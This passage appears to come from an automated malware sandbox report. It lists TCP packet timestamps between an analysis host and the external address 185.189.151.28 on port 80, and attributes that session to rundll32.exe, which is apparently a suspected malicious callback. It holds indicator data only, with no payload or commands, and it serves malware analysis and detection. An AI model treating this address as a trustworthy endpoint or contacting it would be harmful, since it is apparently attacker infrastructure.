May 4, 2022 16:26:39.136373043 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136404037 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136415005 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136442900 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136445999 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136471033 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136507034 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136548996 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136589050 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136629105 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136648893 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136670113 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136672974 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136709929 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136713982 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136739016 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136742115 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136765957 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136785030 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136825085 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136837006 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136863947 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136878014 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136904001 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136941910 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136943102 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136966944 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136981964 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137020111 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137021065 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137042999 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137059927 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137079954 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137090921 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137130022 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137135983 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137170076 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137198925 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137211084 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137223959 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137249947 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137278080 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137284994 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137319088 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137319088 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137358904 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137399912 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137403965 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137438059 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137440920 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137455940 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137480021 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137505054 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137518883 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137531996 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137557983 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137576103 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137597084 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137635946 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137635946 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137667894 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137666941 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137698889 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137708902 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137748003 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137788057 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137808084 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137828112 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137861013 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137865067 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137903929 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137904882 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137938976 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137942076 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137981892 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.138017893 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.138021946 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.138047934 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.138067007 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.138088942 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.138098001 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.138129950 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.138149977 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.138169050 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.138206005 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.138207912 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.138223886 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.138238907 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.138278961 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.138314009 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.201905012 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.220982075 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500380993 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500413895 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500431061 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500447035 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500463009 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500489950 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500503063 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500535011 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.500586033 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.500600100 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500617981 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500649929 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500663996 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.500669003 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.500684977 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.500739098 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518126965 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518151045 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518168926 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518188000 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518207073 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518220901 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518230915 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518234968 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518253088 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518270016 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518270016 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518287897 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518301010 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518305063 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518321991 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518331051 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518402100 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518436909 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518450975 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518469095 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518486023 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518486023 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518503904 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518516064 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518521070 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518538952 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518547058 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518556118 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518568039 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518572092 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518599987 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518630981 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518836021 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518867970 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518913984 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518920898 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518935919 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.518964052 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.518992901 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.535590887 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535617113 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535634995 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535677910 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.535682917 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535701990 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535717964 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535732031 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535733938 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.535746098 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535751104 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.535763025 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535775900 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535784960 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.535819054 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.535832882 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535851002 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535866976 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535886049 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535890102 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.535898924 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535907984 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.535912991 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535929918 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535938978 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.535945892 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535959005 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.535963058 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535979986 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.535981894 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.535996914 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.536012888 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.536015034 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.536026001 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.536037922 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.536039114 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.536057949 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.536067963 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49748 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe |

Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2022 16:26:38.797353983 CEST | 1130 | OUT | |
May 4, 2022 16:26:39.082268000 CEST | 1131 | IN |